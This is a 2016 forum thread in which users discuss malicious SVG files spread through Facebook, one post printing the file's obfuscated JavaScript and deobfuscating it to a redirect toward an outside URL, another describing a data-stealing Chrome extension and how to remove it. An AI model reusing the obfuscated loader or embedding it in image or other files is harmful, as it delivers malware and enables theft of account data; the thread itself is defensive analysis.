Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Facebook SVG file transfering


  • Please log in to reply
7 replies to this topic

#1 2lanh

2lanh

  • Members
  • 2 posts
  • OFFLINE
  •  

Posted 19 November 2016 - 10:23 PM

A friend of mine got infected and sent me an SVG file, she's really closed so I didn't suspect a thing until she spoke out when I asked. However, when I opened it in Internet Explore, it didn't show anything as it appeared as an error and can't open the file. The Antivirus ESET Nod32 didn't response as well. To be sure, I deleted the file and ofc is running a full scan on my computer. I am still a bit worried and paranoid tho, is my computer infected?

 

https://www.virustotal.com/en/file/ce368ce3cab77a864063f9fd86fcca15998372156499091bc7855f1ab56f0296/analysis/1479610286/

link to the file's scan result

my system is windows 10


Edited by 2lanh, 19 November 2016 - 10:37 PM.


BC AdBot (Login to Remove)

 


#2 ShawnSiew

ShawnSiew

  • Members
  • 1 posts
  • OFFLINE
  •  

Posted 20 November 2016 - 04:49 AM

same problem here



#3 MetalowaGlowa

MetalowaGlowa

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:01:34 AM

Posted 20 November 2016 - 05:04 PM

The same happened to me. Got those files from 2 fb friends (with whom I rather don't talk and that arouse my suspicions). Any info on this new fb "virus" ?



#4 macgyerman

macgyerman

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:07:34 PM

Posted 20 November 2016 - 05:06 PM

As far as I can tell you're probably safe. If you download the .svg file and open it with a text editor, you'll see the following code :

 <script type="text/javascript"><![CDATA[
    function mecoqjmg(mngiz,hsmtj,orqek){
      var lwnljr = "oLyX3BxiJavVOAPI4Tz.F8=5Mcg0tf?SKZh_sUEYuNn1DbeCm2/l6d97j:RGpkrH";
      var yixkoy = ["\/updA7I6l=TiRtYn_rmoM2VczJk0sZ8PLB.GxCaj:Sf5Oy41?gDhUe9NvHEFXb3K","527=:.v?rNgVRTsft0pJj6MUA1_dZ9cY\/DyCkl4KiuLm8PXIbexS3nhBEaHFozOG","cD?=FLj78vtRafU26zYsrHukXpKAJ94h50_lo:OMTm.SNynxEC1B\/Pb3IdZVeiGg","_YNP?mru\/g6Vf.CR9tvdzGTkMlx=hJ72FpUBeiZK8Ly:Ocaj0bn45sXD1ESAI3oH","V820ym5f3oGu1CeZxagFkBpXl=j_A9viYOrN?DJh.R6:zLP7dnTMcsb4IKHUtE\/S","YbUJZ:VkXMaerE.9upIFiScymT7z53_L\/v6CAN=4H1?ROPn2Bhjxt0GfoDlsgdK8","cI8j=dE?st\/YKmZgn3:GU5RlPo._vHuOBp79ry1J4CDi2NhakTfXV6AFbLe0MxSz"];
      var cffcjm = "";
      var vgecuv = 0;
      while(yixkoy[vgecuv]){
        vgecuv++;
      }
      var vjnqps = 0;
      while(mngiz[vjnqps]){
        var qepelh = 0;
        var weprnd = -1;
        while(lwnljr[qepelh]){
          if(lwnljr[qepelh] == mngiz[vjnqps]){
            weprnd = qepelh;
            break;
          }
          qepelh++;
        }
        if(weprnd >= 0){
          var ftxhx = 0;
          var wouwgf = -1;
          while(yixkoy[vjnqps%vgecuv][ftxhx]){
            if(yixkoy[vjnqps%vgecuv][ftxhx] == mngiz[vjnqps]){
              wouwgf = ftxhx;
              break;
            }
          ftxhx++;
          }
          cffcjm += lwnljr[wouwgf];
        }else{
          cffcjm += mngiz[vjnqps];
        }
        vjnqps++;
      }
      var sasocg = "";
      for(bnuxb=hsmtj;bnuxb<cffcjm.length;bnuxb++){
        sasocg += cffcjm[bnuxb];
      }
      cffcjm = sasocg;
      return cffcjm;
    }
  var khaify = window;
  var klisuy = mecoqjmg("qn_46UX.qq6MAv/o",13,true);
  var xhzlzb = mecoqjmg("qkv3sTk.veqMYo=Z7_6",11,false);
  var bdcjet = mecoqjmg("kgBwg5??OT8rdMsyGa9",15,true);
  khaify[klisuy][xhzlzb][bdcjet] = mecoqjmg("?Z_hAgLDxE_.K?eJp_djM.o1h/HrsJeUt",2,true);
  ]]></script>

It appears to decrypt some data to then execute a window function (see second to last line and the definition of khaify (4 lines prior).

 

I modified the code and ran it, and it does exactly that.  By replacing the second to last line with 

console.log(klisuy);
console.log(xhzlzb);
console.log(bdcjet);
console.log( mecoqjmg("?Z_hAgLDxE_.K?eJp_djM.o1h/HrsJeUt",2,true));

You'll get

top
location
href
http://mourid.com/php/trust.php

So, it appears that the file attempts to redirect you to http://mourid.com/php/trust.php. Attempting to load the site in a dummy browser returns nothing. Therefore, I assume it's attempting to jack information from HTTP variables (IP, etc.). I have no clue what the point would be.



#5 MetalowaGlowa

MetalowaGlowa

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:01:34 AM

Posted 20 November 2016 - 05:51 PM

Downloaded one photo. Tried to open but had no application for it. So tried online  viewer. There was this code mentioned by macgyverman (not sure if exactly the same). So far nothing happens. No browser page launched. No extensions in browser installed. Running scans with defender/adwcleaner/malware antibytes. Just a prevention.



#6 Tomer

Tomer

  • Members
  • 1 posts
  • OFFLINE
  •  

Posted 20 November 2016 - 06:23 PM

Actually, I believe this is some sort of virus.

I got this from a friend after she opened such an .svg file from a friend of hers.

Other than myself, the rest of her friends also got it.

And they got it again a few times later on.

It seems to send itself over Facebook after you run it.

 

Perhaps the page tests the browser?

She opened it in Internet Explorer, I think.

The file continued being sent (with a different name each time) even after she restarted her computer.



#7 bobkets

bobkets

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:02:34 AM

Posted 20 November 2016 - 07:10 PM

 

I got this "wonderful" thing too, and I played a bit with it. Turns out, it only activates when you are using "Chrome", because it tries to install and extension called "One", which is the darn virus. If you open it with any other browser ( Opera, Firefox, Edge, IE, Safari E.T.C.), you will get only the white page, nothing will happen.

I think, that the main essence from the virus is the extension, because then it tries to steal your data from Facebook. When you open it in chrome, it looks like this: Xyn9g.jpg

If you click "Add extension", you get infected, it redirects to facebook. At this point, you should immediately close Chrome and uninstall it. OR you can open extensions tab and delete extension called "One", but I don't think it removes it completely.

After removing it, I suggest changing Facebook password and logging out from all the other instances. (Facebook offers an option to do so.)

 

Edited by bobkets, 20 November 2016 - 07:10 PM.


#8 2lanh

2lanh
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  

Posted 23 November 2016 - 08:26 AM

Thanks you Bob, I feel much more relieved now :D






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users